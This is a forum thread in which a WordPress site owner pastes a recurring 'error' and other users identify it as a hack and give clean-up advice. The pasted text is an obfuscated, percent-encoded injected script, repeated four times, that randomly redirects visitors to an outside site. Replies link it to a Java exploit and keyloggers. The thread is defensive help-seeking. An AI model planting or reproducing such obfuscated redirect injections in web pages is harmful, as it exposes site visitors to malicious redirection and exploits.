I get this annoying error often!!!

Hi,
I get this error often in my Wp-admin and sometimes in my site too and I have no clue why this occurs.Can anyone help me with it?

document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%72%20%3D%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%3B%0D%0A%72%3D%72%2A%35%30%3B%0D%0A%69%66%28%72%3E%34%39%29%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%31%73%74%6F%6E%6C%69%6E%65%64%65%67%72%65%65%73%2E%63%6F%6D%2F%6F%6E%6C%69%6E%65%2D%64%65%67%72%65%65%73%2D%74%69%6D%65%6F%75%74%2E%68%74%6D%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E')); document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%72%20%3D%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%3B%0D%0A%72%3D%72%2A%35%30%3B%0D%0A%69%66%28%72%3E%34%39%29%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%31%73%74%6F%6E%6C%69%6E%65%64%65%67%72%65%65%73%2E%63%6F%6D%2F%6F%6E%6C%69%6E%65%2D%64%65%67%72%65%65%73%2D%74%69%6D%65%6F%75%74%2E%68%74%6D%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E')); document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%72%20%3D%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%3B%0D%0A%72%3D%72%2A%35%30%3B%0D%0A%69%66%28%72%3E%34%39%29%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%31%73%74%6F%6E%6C%69%6E%65%64%65%67%72%65%65%73%2E%63%6F%6D%2F%6F%6E%6C%69%6E%65%2D%64%65%67%72%65%65%73%2D%74%69%6D%65%6F%75%74%2E%68%74%6D%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E')); document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%72%20%3D%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%3B%0D%0A%72%3D%72%2A%35%30%3B%0D%0A%69%66%28%72%3E%34%39%29%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%31%73%74%6F%6E%6C%69%6E%65%64%65%67%72%65%65%73%2E%63%6F%6D%2F%6F%6E%6C%69%6E%65%2D%64%65%67%72%65%65%73%2D%74%69%6D%65%6F%75%74%2E%68%74%6D%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E'));

Thanks!

 

Looks like you have been hacked.

It loads an iframe java exploit

have a read of 5th post in the thread at
http://forum.swsoft.com/showthread.php?t=48950

and
http://www.honeynet.org/node/187


vagrant.

 

Thanks for the support.
If I change my FTP password will everything become normal?

 

You might have to re-upload Wordpress files also, if the hacker changed any of the files.

 

NO !

You will probably need up backup your your database then wipe wordpress then do a full reinstall again then re-upload your database.

PLEASE NOTE. the exploit, according to the articles listed above, often install a key logger onto your computer as well, so you will need to make sure your computer is clean of infection as well..

After you are sure your computer is cleared, change ALL your on-line passwords .... DP login, bank, email, etc., .... ALL of them, and the sooner the better.

 

After you backup, clean up and re-install, make sure that when you're logging into anything you're using a secure connection, SSL (https://) on the web and SFTP (secure ftp) when uploading files...

 

Hi,
Thanks for all your suggestions.I have a doubt.Say if I backup the files and re-install the WP.If I import the database again won't that files again be installed.Can you get what I am saying?